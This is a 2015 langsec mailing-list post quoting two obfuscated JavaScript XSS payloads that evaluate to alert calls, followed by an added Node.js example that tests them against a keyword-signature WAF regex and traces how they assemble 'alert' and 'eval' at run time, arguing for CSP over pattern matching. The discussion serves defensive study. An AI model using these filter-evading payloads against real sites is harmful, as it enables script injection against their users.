[langsec-discuss] turing-completeness & the impossibility of stopping XSS with WAF

travis+ml-langsec at subspacefield.org
Fri Feb 6 23:44:03 UTC 2015


I don't normally post stuff like this, but since it's already published and salient:

https://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf

For example, this evaluates to alert(1):

($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

And this evaluates to alert(name):

__=''
$$=__+'e'
__=__+'__par'
_=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=x[_]
y=x('nam'+$$)
x(y)
'abc(def)ghi(jkl)mno(pqr)abc(def)abc(def)...' 

Oh dear.

Now, I know we can't solve the halting problem, but I wonder if you
can restrict tricky things that make it hard to reason about the data,
and how much that would affect real-world programs involving TC
languages.  Conversely, could you cripple the run-time behavior by
removing hard-to-reason-about primitives like eval and still process
most things safely?
-- 
http://www.subspacefield.org/~travis/
Split a packed field and I am there; parse a line of text and you will find me.
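As an added example (not from the original mail, nor from the slides it links), the following Node.js script runs a keyword-signature filter of the kind a WAF rule set uses over the two payloads quoted above, and then re-derives, without calling any global function, the strings each payload assembles at run time. The regex, the trace helpers and their names are assumptions made for this illustration.

```javascript
// Added example, not from the original post: a keyword-signature "WAF"
// versus the two payloads quoted in the mail, plus a trace of the strings
// those payloads build from nothing but `[]`, `{}`, `!`, `+` and string
// concatenation. Nothing here calls alert or eval.

// The two payloads exactly as quoted in the mail (constructed constants).
const PAYLOAD_ALERT_1 =
  "($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)";
const PAYLOAD_ALERT_NAME = [
  "__=''", "$$=__+'e'", "__=__+'__par'", "_=$$+'val'", "x=1+[]",
  "z=$$+'nt__'", "x=x[__+z]", "x=x[_]", "y=x('nam'+$$)", "x(y)",
].join("\n");

// A typical signature rule (assumed for this example): block when a
// dangerous identifier is followed by an opening parenthesis.
const SIGNATURE = /\b(alert|eval|prompt|confirm|Function)\s*\(/i;

function wafBlocks(body) {
  return SIGNATURE.test(body);
}

// Re-derive, step by step, what the first payload spells. Each index is
// evaluated exactly as the payload evaluates it; only string values result.
function traceAlertPayload() {
  const $ = [];
  const _ = -~-~-~$;          // ~[] is -1, negated is 1; three rounds give 3
  const falseStr = !$ + $;    // "false"
  const objStr = {} + $;      // "[object Object]"
  const trueStr = !'' + $;    // "true"
  // "s" + "o" + "r" + "t": the method the payload calls on [[]] to reach the global object
  const method = falseStr[_] + objStr[_ / _] + trueStr[_ / _] + trueStr[+$];
  // "a" + "l" + "e" + "rt": the property it then reads off that global
  const name = falseStr[_ / _] + falseStr[_ + ~$] + trueStr[_] + trueStr[_ / _] + trueStr[+$];
  return { method, name };
}

// Same for the second payload: the property, method and argument names
// are concatenated from fragments that never appear whole in the source.
function traceNamePayload() {
  let __ = '';
  const $$ = __ + 'e';
  __ = __ + '__par';
  const _ = $$ + 'val';
  const z = $$ + 'nt__';
  return { property: __ + z, method: _, argument: 'nam' + $$ };
}

// Stand-alone run: the plain form is caught, the quoted forms are not,
// and the traces show why: the keywords only exist after evaluation.
console.log("alert(1) blocked:", wafBlocks("alert(1)"));
console.log("payload 1 blocked:", wafBlocks(PAYLOAD_ALERT_1), traceAlertPayload());
console.log("payload 2 blocked:", wafBlocks(PAYLOAD_ALERT_NAME), traceNamePayload());
```

The traces print `sort`/`alert` and `__parent__`/`eval`/`name`: the first payload reaches the global object through an unqualified `[].sort()` call in sloppy mode, the second through the non-standard `__parent__` property that older SpiderMonkey builds exposed, and neither contains the token a signature would need until the interpreter has run it. That is the practical shape of Travis's halting-problem remark: what the WAF can match on the wire is not what executes, so the defender's lever is the execution context (scripts that cannot be injected at all, a CSP that forbids inline script and `'unsafe-eval'`) rather than pattern matching on request bodies.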
